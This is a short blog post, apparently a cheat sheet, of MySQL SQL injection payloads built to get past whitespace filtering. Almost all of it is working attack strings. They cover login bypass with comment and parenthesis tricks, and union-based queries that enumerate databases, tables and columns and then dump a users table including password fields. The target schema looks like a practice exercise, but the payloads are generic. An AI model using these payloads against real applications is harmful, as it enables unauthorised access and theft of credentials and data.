In certain situation SQLMap might fail because it is possible white spaces may be filtered. In MySQL it is possible to convert normal payloads to ones without spaces.
When Whitespaces are not allowed use Use () and # or /*commentshere*/ for comments
Normal SQLi --> Admin’ or ‘’='
TRY:
Admin’or(‘’)=’
root'/**/or/**/'1'='1
Admin’or(‘’)=’
root'/**/or/**/'1'='1
Get number of Columns
- admin' union select database(),user(),@@version,null,null-- j
- admin'union(select(database()),user(),@@version,null,null)%23
Get list of databases
- admin' UNION ALL SELECT NULL,NULL,schema_name,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- RPYg
- admin'UNION(SELECT(NULL),NULL,schema_name,NULL,(NULL)FROM(INFORMATION_SCHEMA.SCHEMATA))%23
Get list of tables in a particular DB
- admin' UNION SELECT NULL,NULL,table_name ,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='information_schema'-- SlTg
- admin'UNION(SELECT(NULL),NULL,table_name,NULL,(NULL)FROM(INFORMATION_SCHEMA.TABLES)WHERE(table_schema)='information_schema')%23
Get Column names in a table
- admin' UNION SELECT NULL,COLUMN_TYPE,COLUMN_NAME,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='exercises' AND TABLE_NAME='users'-- RPYg
- admin'UNION(SELECT(NULL),COLUMN_TYPE,COLUMN_NAME,NULL,(NULL)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_SCHEMA)=('exercises')AND(TABLE_NAME)='users')%23
- admin'UNION(SELECT(NULL),COLUMN_TYPE,COLUMN_NAME,NULL,(NULL)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_SCHEMA)=('exercises')AND(TABLE_NAME)='users')%23
Get data from table (after column names)
- admin' UNION ALL SELECT NULL,NULL,CONCAT(';;',age,';;',groupid,';;',id,';;',name,';;',passwd,';;'),NULL,NULL FROM exercises.users-- BxLe
- Age, group,id where names of the columns retrieved above.
- admin'UNION(SELECT(NULL),NULL,CONCAT(';;',age,';;',groupid,';;',id,';;',name,';;',passwd,';;'),NULL,(NULL)FROM(exercises.users))%23
No comments:
Post a Comment